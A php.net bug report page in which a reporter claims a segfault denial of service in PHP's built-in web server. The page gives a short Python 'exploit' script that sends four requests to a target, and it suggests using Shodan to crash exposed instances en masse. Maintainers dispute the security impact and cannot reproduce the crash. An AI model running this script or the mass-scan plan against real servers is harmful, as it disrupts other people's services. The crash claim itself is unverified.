php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #78047 [DoS] Segmentation fault through HTTP Requests
Submitted: 2019-05-21 11:45 UTC Modified: 2021-08-08 04:22 UTC
Votes:10
Avg. Score:4.3 ± 1.2
Reproduced:0 of 0 (0.0%)
From: michele dot cisternino at protonmail dot com Assigned: cmb (profile)
Status: No Feedback Package: Built-in web server
PHP Version: 7.3Git-2019-05-21 (snap) OS: Linux
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: michele dot cisternino at protonmail dot com
New email:
PHP Version: OS:

 

 [2019-05-21 11:45 UTC] michele dot cisternino at protonmail dot com
Description:
------------
Hi,

I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation fault.

I think the vulnerability resides in the way the server handle the HTTP requests.

The steps to reproduce to trigger the segmentation fault are the following:

$ apt install php
$ mkdir server
$ cd server
$ touch file.php
$ php -S 0.0.0.0:80
$ python exploit.py 127.0.0.1 #But could be a remote server as well

You can find the exploit in the "Test script" section.

Further investigations of the issue could lead an attacker to exploit the memory corruption in the server to get a reverse shell (eg. Buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.

Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print "[!] Usage: %s TARGET" % sys.argv[0]
    exit()

target = sys.argv[1].strip()

if not target.startswith("http://") and not target.startswith("https://"):
    target = "http://" + target

if not target.endswith("/"):
    target = target + "/"

filenames = ["", "file.php", "test.php", ""]

print "[*] Sending requests to %s." % target
try:
    for filename in filenames:
        requests.get(target + filename)
    print "The exploit didn't worked."
except requests.exceptions.ConnectionError:
    print "The exploit worked!"

Expected result:
----------------
The server crash with "Segmentation fault" error.


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-21 15:18 UTC] michele dot cisternino at protonmail dot com
The exploit consists in sending HTTP requests in the following order:

1 - Request the base URL
2 - Request a valid file on the server
3 - Request a non-existent file on the server
4 - Request the base URL
 [2019-05-21 17:46 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2019-05-21 17:46 UTC] cmb@php.net
> The vulnerability could be exploited by an attacker […]

No, it can not, because the built-in webserver is for
*development* purposes only.
 [2019-05-21 18:35 UTC] michele dot cisternino at protonmail dot com
Sorry for the late reply.

Yes, the server is usually used for testing purposes, but it can be esposed to the internet as well.
You can launch a simple query on Shodan to find multiple instances of the built-in PHP server exposed.

An attacker could write a script that launch a request to the Shodan's API, get a list of vulnerable instances and DoS them all iteratively.

Moreover, In my daily pentest-job, I found this kind of Server not exposed to the internet, but used internally by the companies.
An attacker, thanks to the exploit I wrote, could cause a continuous DoS.

Moreover, as I already said, the vulnerability could be further investigated to upgrade it to an RCE.

I hope you understand the criticality of the vulnerability.
 [2019-05-22 07:40 UTC] cmb@php.net
To clarify: the built-in web server *can* of course be connected
to a public network; it is, however, not supposed to[1].  Therefore
we do not consider any issues related to the built-in web server
to be security issues.

[1] <https://www.php.net/manual/en/features.commandline.webserver.php>
 [2019-05-22 07:57 UTC] michele dot cisternino at protonmail dot com
I disagree, respectfully.
A malicious user, thanks to this exploit, can crash all the public instances of the built-in server (around 2.000, in my search).

Anyway, if you don't agree, I can disclose it (you also switched the status from Private to Public), so we can see what the hacking community think about it.

Have a nice day :)
 [2019-05-22 08:12 UTC] spam2 at rhsoft dot net
> can crash all the public instances of the built-in server

hopefully and then the people maybe read the first red box at https://www.php.net/manual/en/features.commandline.webserver.php
 [2019-05-23 09:25 UTC] nikic@php.net
I can't reproduce this on a 7.3 nts build. Also no warnings when running under valgrind.
 [2019-05-23 13:30 UTC] michele dot cisternino at protonmail dot com
It doesn't matter anymore :')
It's just a bug, rofl.
 [2021-07-30 11:42 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2021-07-30 11:42 UTC] cmb@php.net
> It's just a bug, rofl.

If nobody can reproduce a reported bug, there may be no bug. ;)
 [2021-08-08 04:22 UTC] php-bugs at lists dot php dot net
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Re-Opened". Thank you.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Dec 03 05:01:32 2024 UTC